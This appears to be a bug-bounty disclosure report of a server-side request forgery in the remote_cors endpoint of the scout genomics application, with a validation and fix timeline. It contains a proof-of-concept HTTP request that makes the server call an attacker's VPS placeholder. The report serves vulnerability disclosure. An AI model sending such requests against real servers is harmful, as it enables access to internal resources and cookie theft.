Server-Side Request Forgery in scout in clinical-genomics/scout

Valid

Reported on

May 3rd 2022


Description

Server-Side Request Forgery in remote_cors

Proof of Concept

GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


PoC Image

image

Impact

An attacker could make the application perform arbitrary requests to fishing steal cookie, request to private area, or lead to xss...

We are processing your report and will contact the clinical-genomics/scout team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
Nhien.IT modified the report
2 years ago
Nhien.IT modified the report
2 years ago
Nhien.IT modified the report
2 years ago
We have contacted a member of the clinical-genomics/scout team and are waiting to hear back 2 years ago
Chiara Rasi validated this vulnerability 2 years ago
nhienit2010 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Chiara Rasi marked this as fixed in v4.42 with commit b0ef15 2 years ago
Chiara Rasi has been awarded the fix bounty
Nhien.IT
2 years ago

Researcher


Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help

Jamie Slome
2 years ago

Sorted 👍

to join this conversation